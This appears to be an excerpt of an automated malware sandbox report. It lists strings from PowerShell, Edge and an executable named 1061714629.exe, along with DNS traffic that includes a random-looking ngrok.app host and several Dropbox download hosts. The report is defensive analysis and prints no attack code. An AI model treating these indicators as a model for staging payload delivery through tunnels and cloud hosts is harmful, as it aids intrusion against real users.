https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: font-src https://* data: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: img-src https://* data: blob: ; font-src https://* data: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ne' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: opboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                      Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                      Source: global trafficDNS traffic detected: DNS query: uc4d30225f32433b48811132b259.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: uc7569213660364555d096b4af3d.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                      Source: 1061714629.exe, 0000001F.00000002.1934052501.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 1061714629.exe, 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 0000001F.00000000.1711603757.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 00000022.00000000.1884738156.000000000053D000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatch
                      Source: 1061714629.exe, 0000001F.00000002.1934052501.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 1061714629.exe, 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 0000001F.00000000.1711603757.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 00000022.00000000.1884738156.000000000053D000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://.macromedia.com/support/flashplayer/sys/https://SettingsSubdomainmms.cfgdefaultAuthorLocalSec
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                      Source: msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                      Source: msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
